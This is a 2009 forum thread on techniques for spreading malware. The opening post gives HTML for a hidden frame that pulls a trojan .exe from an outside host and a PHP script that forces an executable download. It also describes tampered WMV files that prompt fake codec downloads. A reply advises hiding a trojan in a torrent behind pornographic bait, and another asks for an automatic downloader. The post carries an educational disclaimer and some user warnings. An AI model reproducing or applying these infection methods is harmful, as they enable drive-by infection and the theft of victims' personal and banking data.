1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Different Techniques use to infect Malwares Around the internet!

Discussion in 'Ethical hacking Tips' started by P455w0rd_Cr4kz, Jan 13, 2009.

  1. P455w0rd_Cr4kz

    P455w0rd_Cr4kz New Member

    Joined:
    Jan 12, 2007
    Messages:
    199
    Likes Received:
    12
    Trophy Points:
    0
    Location:
    H3LL
    Home Page:
    Before i start writing this small article i want to say that the presented information is for educational purposes and by no means Go4expert or myself takes any responsability for any misuse of the information and mentioned tools.


    However,i must say there are plenty more tactics,tools and tricks.

    Simply by using a php file,you can use it as a trojan/malware downloader.

    Iframe in HTML Method
    Example of this is:

    HTML:
    <html><head><title> </title></head><frameset rows="0,*">
    <frame src="http://webisite.com/CALC.EXE" name="top_frame" frameborder="0" scrolling="no" noresize="noresize" marginheight="0" marginwidth="0"/>
    <noframes></body></noframes></frameset></html>
    Note CALC>exe (that would be the trojan)
    ==========================================================

    Octect/sockets en PHP Method

    With a php file you can use a short script to call your .exe file and ask for the download. Note that the PHP file and the EXE file must be in the same path,or you can also modify the path in the $flnm="file.exe"

    Example:
    PHP:
    <?php
    $flnm 
    "archive.exe";
    $size filesize($flnm);
    $fp fopen($flnm"r");
    $src fread($fp$size);
    fclose($fp);
    header("Accept-Ranges: bytes\r\n");
    header("Content-Length: ".$size."\r\n");
    header("Content-Disposition: inline; filename=".$flnm);
    header("\r\n");
    header("Content-Type: application/octet-stream\r\n\r\n");
    echo 
    $src;
    ?>
    ==========================================================
    WMV With URLANDEXIT

    This Method is very popular this days.Nowadays you can spread malware by uploading tricked wmv files to limewire/ares and other file/moviews shared sites.

    With tools like the one shown below you can edit the wmv file to set up a stop time on the file and ask a user to download a fake codec.
    [​IMG]

    If you look closely,when the innocent user tries to watch the movie clip,it will show them a message asking for the download. Please see the picture below for a better idea.
    [​IMG]

    ==========================================================
    Be aware of your settings in your pc, do not download anything from a website you don't trust. Below is a picture of an old downloader that used the exploit on old IE/windos This Tool will create a downloader with an extension Jpeg including the picture icon


    [​IMG]


    ==========================================================
    The same exploits were used and were very popular couple of years back using a Html downloader. Please see below for a picture so you can have a better idea.


    [​IMG]


    ==========================================================

    These has been some of the most popular tools used time ago. Obviously and as you should be aware;the techniques are getting more sophisticated by the day.

    On purpose i have not mentioned any of the websites where you can download this tools. Researching is the most accurate way to be uptodate on this bad intentioned people tactics to make innocent internet users get inffected.

    Why would a hacker/script kiddie go thru all this programs and set up websites?

    It is very simple,once you get inffected with a RAT( remote Administration tools) they have complete access to your computer. All your most personal information is exposed to them. And......they can use your pc as a zombie to atack other sites via DDOS.

    Also understand that even with a simple Keylogger( keystroke Recorder) they could access all your emails,all your online banking sites,paypal and lots of your personal info.

    I hope this article was interesting for you. I am recovering at this moment from a very serious surgery,so please don't message me trying to get links for downloading this tools.
    P455w0rd_Cr4kz
     
  2. TriG0rZ

    TriG0rZ New Member

    Joined:
    Oct 2, 2008
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    UK
    thanks for the info man, imo its always good to learn about how these tech were used in order to prevent them happening from you and they really are good for educational purpose's!
     
  3. Bhullarz

    Bhullarz New Member

    Joined:
    Nov 15, 2006
    Messages:
    253
    Likes Received:
    13
    Trophy Points:
    0
    Occupation:
    System Manager
    Home Page:
    Really Nice one !!!
     
  4. hanleyhansen

    hanleyhansen New Member

    Joined:
    Jan 24, 2008
    Messages:
    336
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Drupal Developer/LAMP Developer
    Location:
    Clifton
    Home Page:
    Great stuff!!
     
  5. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,292
    Likes Received:
    365
    Trophy Points:
    83
  6. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    Nice stuff
     
  7. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    496
    Likes Received:
    36
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    1 question in that php script if we include any exe file, will user be prompted to download it? is there any way for auto downloader??
     
  8. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,292
    Likes Received:
    365
    Trophy Points:
    83
  9. asadullah.ansari

    asadullah.ansari TechCake

    Joined:
    Jan 9, 2008
    Messages:
    356
    Likes Received:
    14
    Trophy Points:
    0
    Occupation:
    Developer
    Location:
    NOIDA
    It's really nice...
     
  10. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    496
    Likes Received:
    36
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    other way i cud suggest is put ur trojan and pack it in a torrent! put something good like aishwarya rai's xxx and all.. u get 1000s of downloads a day... and ur ftp is blown out because of logs :P
     
  11. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,292
    Likes Received:
    365
    Trophy Points:
    83

Share This Page